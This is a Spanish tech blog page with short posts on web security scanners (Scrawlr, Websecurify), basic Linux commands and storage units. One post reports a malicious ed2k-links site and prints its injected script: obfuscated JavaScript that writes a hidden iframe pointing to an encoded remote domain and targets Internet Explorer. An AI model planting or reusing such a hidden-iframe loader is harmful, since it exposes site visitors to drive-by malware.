Desde el Blog de Mark Painter (The HP Security Laboratory Blog) podemos descargar Scrawlr, una herramienta de HP para sistemas operativos Windows (Quizás con Wine…) que realiza un escáner a tu sitio web en busca de debilidades que puedan facilitar a un atacante una inyección SQL. Después del revuelo de los ataques masivos vía SQL, no está de mas probar ésta herramienta gratuita.

Descarga SCrawlr desde la web oficial de HP rellenando éste formulario.

Más información sobre los ataques masivos aquí:  http://www.computerworld.com/

Scrawlr FAQ:   h30507.www3.hp.com

Otros: PowerPoint de Isabel Gomez y Miguel Jimenez/Defensa_contra_ataques_web_comunes

Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry

La mayoría de éstos comandos son muy usados en la mayoría de ramas GNU/Linux, aunque según la distribución que usemos éstos lógicamente podrían variar. Os dejamos una pequeña recopilación de algunos de los comandos mas usados generalizadamente y que seguramente te serán de gran utilidad independientemente de la distro que uses.

Comandos archivos y directorios (crear y borrar directorios, listar, copiar, renombrar y borrar archivos, crear enlace entre archivos…etc):

ls : Listar archivos y directorios.
cp : Copiar archivos y directorios.
pwd : Mostrar el nombre del directorio de trabajo actual.
cd : Cambiar de directorio.
sort : Ordenar ficheros.
mkdir : Crear directorios.
touch : Crear o actualizar ficheros.
rm : Borrar archivos y/o directorios.
rmdir : Borrar directorios vacios.
mv : Mover o renombrar archivos.
more : Muestra ficheros página a página.
less : Muestra Ficheros página a página.
cat : Mostrar ficheros de forma continua.
head : Ver el inicio de un archivo.

Read the rest of this entry

Hace algunos meses encontremos esta interesante imagen en la web geeksroom, donde se nos explica (en español ) para hacernos una idea de una forma gráfica lo que ocuparían unidades de almacenamiento de tal envergadura. Así pues, de momento el Yottabyte nos sirve de medida para por ejemplo averiguar el “peso” de un descomunal volumen de archivos y datos.

(Ejemplo 1: Tengo el correo electrónico saturado de basura, mi carpeta de Spam ocupa 16 Yottabytes)

(Ejemplo 2: 03/04/2080 Apple lanza el Iphone 30 con 1 Yottabyte de capacidad!)

Hoy en día esto es irrisorio e imposible con nuestra tecnología, pero mirando atrás…hace apenas 43 años que IBM comercializaba el floppy disk, toda una novedad en la época.  La nanotecnología y varios descubrimientos y avances ha hecho posible que cada vez dispongamos de más espacio de almacenamiento en menos espacio físico así como de más mejoras y prestaciones y ya están apareciendo discos solidos de almacenamiento (SSD) de capacidades gigantes (Igual que sus precios), pero será posible algún día disponer de un dispositivo de almacenamiento doméstico de 1 Yottabyte? Necesitaremos tanto espacio?. Tiempo al tiempo… Read the rest of this entry

Websecurify es un escáner automático de seguridad en aplicaciones Web para plataformas Windows, Mac OS y GNU/Linux,  realmente intuitivo y fácil de utilizar.

Éstos son algunos de los aspectos mas interesantes de Websecurify:

1. Es 100% open source, GPL, producto CC, listo para beneficiar al movimiento de código abierto.

2. El motor emplea tecnologías, como los trabajadores Web, desde las últimas especificaciones de HTML5.

3. La mayoría del código está escrito en JavaScript, pero muchas partes pueden reescribirse y ampliarse con Python, Java y C.

4. Las pruebas y los mecanismos de información son asincrónicos. Esto significa que el informe se puede consultar mientras se realiza el examen. También significa que las decisiones se adoptan de inmediato, es decir, no están programadas.

5. Puede ser ampliado en más o menos la misma forma que se puede extender Firefox y Thunderbird…

Más información y descargas:

Página web oficial: Websecurify Escáner

Código Fuente: Websecurify Source

GNUZITIZEN: gnucitizen.org / gnucitizen.net